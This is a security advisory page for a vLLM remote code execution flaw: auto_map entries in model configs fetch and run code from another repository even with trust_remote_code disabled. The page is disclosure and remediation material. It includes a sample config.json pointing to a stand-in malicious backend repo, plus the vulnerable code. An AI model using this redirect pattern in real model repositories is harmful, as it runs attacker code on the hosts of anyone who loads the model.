
exploitDog


GHSA-8fr4-5q9j-m8gm

Published: Dec 2, 2025
Source: github
GitHub: Reviewed
CVSS3: 7.1

Description

vLLM vulnerable to remote code execution via transformers_utils/get_config

Summary

vllm has a critical remote code execution vector in a config class named Nemotron_Nano_VL_Config. When vllm loads a model config that contains an auto_map entry, the config class resolves that mapping with get_class_from_dynamic_module(...) and immediately instantiates the returned class. This fetches and executes Python from the remote repository referenced in the auto_map string. Crucially, this happens even when the caller explicitly sets trust_remote_code=False in vllm.transformers_utils.config.get_config. In practice, an attacker can publish a benign-looking frontend repo whose config.json points via auto_map to a separate malicious backend repo; loading the frontend will silently run the backend’s code on the victim host.
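To make the two-repo setup concrete, here is a minimal sketch of what such a frontend config.json could contain. The repo name `evil-org/malicious-backend`, the module `configuration_backend`, and the class `BackendConfig` are hypothetical, chosen only to illustrate the `<repo_id>--<module>.<ClassName>` format that the vulnerable code splits on `--`:

```python
import json

# Hypothetical frontend config.json: the vision_config's auto_map entry
# points at a *different* repo ("evil-org/malicious-backend"), whose
# configuration_backend.py would be fetched and imported on load.
frontend_config = {
    "model_type": "Llama_Nemotron_Nano_VL",
    "vision_config": {
        "auto_map": {
            # Format: "<repo_id>--<module>.<ClassName>"
            "AutoConfig": "evil-org/malicious-backend--configuration_backend.BackendConfig"
        }
    },
}

print(json.dumps(frontend_config, indent=2))
```

Nothing in the frontend repo itself needs to look malicious; the payload lives entirely in the backend repo named by the `auto_map` string.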

Details

The vulnerable code resolves and instantiates classes from auto_map entries without checking whether those entries point to a different repo or whether remote code execution is allowed.

class Nemotron_Nano_VL_Config(PretrainedConfig):
    model_type = 'Llama_Nemotron_Nano_VL'

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        if vision_config is not None:
            assert "auto_map" in vision_config and "AutoConfig" in vision_config["auto_map"]
            # <-- vulnerable dynamic resolution + instantiation happens here
            vision_auto_config = get_class_from_dynamic_module(
                *vision_config["auto_map"]["AutoConfig"].split("--")[::-1]
            )
            self.vision_config = vision_auto_config(**vision_config)
        else:
            self.vision_config = PretrainedConfig()

get_class_from_dynamic_module(...) is capable of fetching and importing code from the Hugging Face repo specified in the mapping. trust_remote_code is not enforced for this code path. As a result, a frontend repo can redirect the loader to any backend repo and cause code execution, bypassing the trust_remote_code guard.
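The missing check is easy to express. Below is an illustrative sketch of the kind of guard this code path needs (the function name and structure are hypothetical, not the actual patch in vllm): refuse to resolve an auto_map entry unless the caller explicitly opted in with trust_remote_code.

```python
def resolve_vision_config_class(vision_config: dict, trust_remote_code: bool):
    """Resolve an auto_map AutoConfig entry, refusing remote code unless allowed.

    Illustrative sketch only; the real fix lives in vllm's config utilities.
    """
    auto_map = vision_config.get("auto_map", {})
    ref = auto_map.get("AutoConfig")
    if ref is None:
        raise ValueError("vision_config has no auto_map AutoConfig entry")
    if not trust_remote_code:
        # Refuse to fetch and execute code from the repo named in the mapping.
        raise ValueError(
            f"auto_map entry {ref!r} requires remote code, "
            "but trust_remote_code=False"
        )
    # Same split as the vulnerable code: "<repo>--<module>.<Class>" reversed.
    class_ref, repo_id = ref.split("--")[::-1]
    # Only reached when the caller explicitly opted in; in real code this
    # would call get_class_from_dynamic_module(class_ref, repo_id).
    return class_ref, repo_id
```

The key property is that the trust decision happens before any network fetch or import, so a hostile frontend repo cannot redirect the loader silently.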

Impact

This is a critical vulnerability because it breaks the documented trust_remote_code safety boundary in a core model-loading utility. The vulnerable code lives in a common loading path, so any application, service, CI job, or developer machine that uses vllm’s transformer utilities to load configs can be affected. The attack requires only two repos and no user interaction beyond loading the frontend model. A successful exploit can execute arbitrary commands on the host.

Fixes

Packages

Name: vllm (pip)
Affected versions: < 0.11.1
Fixed version: 0.11.1
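To check whether an installed vllm falls in the affected range, a quick sketch using the stdlib importlib.metadata (naive numeric comparison, assuming a plain X.Y.Z version string; pre-release suffixes are not handled):

```python
from importlib import metadata

def is_affected(version: str) -> bool:
    """Return True if a vllm version string is in the affected range (< 0.11.1)."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    return parts < (0, 11, 1)

try:
    installed = metadata.version("vllm")
    print("vllm", installed, "affected:", is_affected(installed))
except metadata.PackageNotFoundError:
    print("vllm is not installed")
```

For production use, a proper version parser (e.g. the `packaging` library) is safer than splitting on dots.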

EPSS

Percentile: 39%
Score: 0.00176 (Low)

7.1 High

CVSS3

Weaknesses

CWE-94

Related vulnerabilities

CVSS3: 7.1
nvd
2 months ago

vLLM is an inference and serving engine for large language models (LLMs). Prior to 0.11.1, vllm has a critical remote code execution vector in a config class named Nemotron_Nano_VL_Config. When vllm loads a model config that contains an auto_map entry, the config class resolves that mapping with get_class_from_dynamic_module(...) and immediately instantiates the returned class. This fetches and executes Python from the remote repository referenced in the auto_map string. Crucially, this happens even when the caller explicitly sets trust_remote_code=False in vllm.transformers_utils.config.get_config. In practice, an attacker can publish a benign-looking frontend repo whose config.json points via auto_map to a separate malicious backend repo; loading the frontend will silently run the backend’s code on the victim host. This vulnerability is fixed in 0.11.1.

CVSS3: 7.1
debian
2 months ago

vLLM is an inference and serving engine for large language models (LLM ...
